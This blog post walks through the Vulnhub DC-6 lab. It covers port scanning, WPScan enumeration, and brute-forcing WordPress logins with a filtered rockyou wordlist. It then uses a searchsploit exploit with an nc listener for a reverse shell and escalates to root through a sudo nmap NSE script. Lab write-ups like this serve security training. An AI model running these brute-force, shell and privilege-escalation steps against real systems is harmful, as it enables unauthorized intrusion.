Vulnhub DC6 Walkthrough

First we start by adding the host name to the /etc/hosts file as instructed on the site

After running netdiscover and finding out the host ip we run nmap to scan the host for open ports:

Nmap –A –T4 –p- –vv

Port 22 and port 80 are open so we enter the IP in the browser and see the webpage

We are redirected to a webpage http://wordy .. I use Wappalyzer and it shows that the page is using WordPress 5.1.1

Also lets run Nikto on the host IP

The site is running WordPress service and there is a login page

The name Jens Dagmeister could be useful ( it’s in the webpage) .

Also to cover all the bases lets run dirb

So as we said the page is running WordPress service scanning it with WPScan is the next step :

We got 5 names (admin-graham-mark-sarah-jens)

So now we can brute force the 5 names with rockyou.txt

“OK, this isn’t really a clue as such, but more of some “we don’t want to spend five years waiting for a certain process to finish” kind of advice for those who just want to get on with the job.

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt That should save you a few years.”

This advice from the creator of the lab to reduce the rockyou file to few passwords as from millions to only  2668 words.

Put all the usernames in a file save it and run the next command

wpscan –url http://wordy/ -P /root/passwords.txt -U /root/names.txt

a hit will come back from one of the users along with the password

And we inside wordpress dashboard

Searchsploit WordPress  came with a few exploits , one of them is activity monitor which we have in here on this site

Copy the exploit file 45274.html and edit the IP , port and address

Open a nc –lvp 999 on your machine and open the html file on your explorer and a page with a button (Submit Request) , and as you press the button you will get a low privilege shell

CD to /home and mark found a file named thing-to-do.txt , viewing the file gave me another username and password

Ssh graham@ with the provided password gave me a login to the account

Switching from garaham to using sudo –l ,  and viewing the files there is a bash file to run

Writing sudo –l shows a message that user jens can run “/usr/bin/nmap”  without password ,so taking privilege using nmap we can run the following commands

echo “os.execute(‘/bin/sh’)” > /tmp/shell.nse

sudo nmap –script=/tmp/shell.nse

CAT the theflag.txt and we done !!!

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s